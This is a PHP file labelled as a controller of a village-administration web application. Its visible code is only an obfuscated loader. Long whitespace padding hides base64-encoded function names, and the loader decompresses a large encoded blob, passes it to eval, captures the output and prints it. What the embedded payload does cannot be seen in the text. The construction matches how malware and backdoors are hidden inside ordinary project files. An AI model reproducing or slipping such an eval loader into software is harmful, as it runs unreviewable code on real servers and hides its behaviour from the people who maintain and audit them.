<?php 
        $__='printf';$_='Loading donjo-app/controllers/Bumindes_penduduk_induk.php';
        







































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































































                                                                                                                                                                                                                     $________;
